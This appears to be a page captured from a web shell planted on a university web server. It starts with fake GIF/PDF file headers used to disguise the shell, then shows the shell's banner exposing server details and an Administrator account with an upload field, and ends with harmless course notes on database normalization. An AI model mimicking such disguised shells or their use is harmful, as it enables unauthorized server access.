GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1600/Week/13/ |
Upload File : |
* = primary key (PK) @ = foreign key (FK) ^ = unique field (UNI) UNF: employee table Employee Age Department Melvin 32 Marketing, Sales Edward 45 Quality Assurance Alex 36 Human Resource 1NF: employee table Employee Age Department Melvin 32 Marketing Melvin 32 Sales Edward 45 Quality Assurance Alex 36 Human Resource 3NF: employee table Employee* Age Melvin 32 Edward 45 Alex 36 department table departmentId* Department^ 1 Sales 2 Quality Assurance 3 Human Resource 4 Marketing employee_department table Employee*@ departmentId*@ Melvin 4 Melvin 1 Edward 2 Alex 3